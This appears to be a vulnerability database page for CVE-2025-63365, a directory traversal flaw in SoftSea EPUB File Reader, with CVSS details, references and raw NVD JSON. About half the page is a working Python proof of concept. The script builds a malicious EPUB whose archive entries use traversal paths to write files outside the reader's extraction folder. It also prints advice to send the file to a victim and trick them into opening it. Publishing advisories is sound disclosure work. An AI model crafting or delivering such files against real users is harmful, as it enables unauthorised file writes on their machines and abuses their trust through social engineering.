CVE-2025-63365

Description

SoftSea EPUB File Reader 1.0.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the EPUB file processing component, specifically in the functionality responsible for extracting and handling EPUB archive contents.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:epubfilereader:epub_file_reader:1.0.0.0:*:*:*:*:*:*:* - VULNERABLE

SoftSea EPUB File Reader <= 1.0.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os

def create_malicious_epub():
    """
    PoC for CVE-2025-63365: SoftSea EPUB File Reader Directory Traversal
    This PoC creates a malicious EPUB file that exploits the path traversal vulnerability.
    The EPUB contains a file with path traversal sequences to write outside the target directory.
    """
    
    # Create the malicious EPUB file
    with zipfile.ZipFile('malicious_traversal.epub', 'w', zipfile.ZIP_DEFLATED) as epub:
        # Mimetype file (required for valid EPUB)
        epub.writestr('mimetype', 'application/epub+zip', compress_type=zipfile.ZIP_STORED)
        
        # META-INF/container.xml (required for EPUB structure)
        container_xml = '''<?xml version="1.0"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
  <rootfiles>
    <rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
  </rootfiles>
</container>'''
        epub.writestr('META-INF/container.xml', container_xml)
        
        # OEBPS/content.opf
        content_opf = '''<?xml version="1.0"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="bookid" version="2.0">
  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/">
    <dc:title>Malicious EPUB</dc:title>
    <dc:creator>Attacker</dc:creator>
    <dc:identifier id="bookid">urn:uuid:12345</dc:identifier>
  </metadata>
  <manifest>
    <item id="content" href="content.xhtml" media-type="application/xhtml+xml"/>
  </manifest>
  <spine toc="ncx">
    <itemref idref="content"/>
  </spine>
</package>'''
        epub.writestr('OEBPS/content.opf', content_opf)
        
        # OEBPS/content.xhtml
        content_xhtml = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Content</title></head>
<body><p>Malicious EPUB content</p></body>
</html>'''
        epub.writestr('OEBPS/content.xhtml', content_xhtml)
        
        # MALICIOUS: Path traversal to write outside the target directory
        # This file will be written to ../../../malicious_file.txt
        malicious_content = 'This file was written via path traversal vulnerability!\nPayload executed successfully.'
        
        # Use different path traversal patterns for cross-platform compatibility
        # Windows-style traversal
        epub.writestr('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\pwned_windows.txt', malicious_content)
        # Unix-style traversal
        epub.writestr('../../../../../../../../../../../../tmp/pwned_unix.txt', malicious_content)
        
        # Alternative: Read sensitive files via traversal
        # This demonstrates the file read capability
        print('[+] Created malicious EPUB file: malicious_traversal.epub')
        print('[+] The EPUB contains files with path traversal sequences')
        print('[+] When opened with vulnerable SoftSea EPUB Reader, files will be extracted outside target directory')
        print('[+] Unix target: ../../../../../../../../../../../../tmp/pwned_unix.txt')
        print('[+] Windows target: ../../../../../../../../../../../../temp/pwned_windows.txt')

if __name__ == '__main__':
    create_malicious_epub()
    print('\n[!] Usage: Send malicious_traversal.epub to victim and trick them into opening it with SoftSea EPUB Reader 1.0.0.0')
    print('[!] This PoC is for educational and security research purposes only!')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63365
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63365
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63365/
[4] VulDB https://vuldb.com/cve/CVE-2025-63365
[5] http://epub.com
[6] https://jeroscope.com/advisories/2025/jero-2025-001/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63365", "sourceIdentifier": "[email protected]", "published": "2025-12-01T19:15:51.373", "lastModified": "2025-12-23T13:17:12.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SoftSea EPUB File Reader 1.0.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the EPUB file processing component, specifically in the functionality responsible for extracting and handling EPUB archive contents."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:epubfilereader:epub_file_reader:1.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F560F17C-879F-4888-B73F-B2C60003EFB2"}]}]}], "references": [{"url": "http://epub.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://jeroscope.com/advisories/2025/jero-2025-001/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}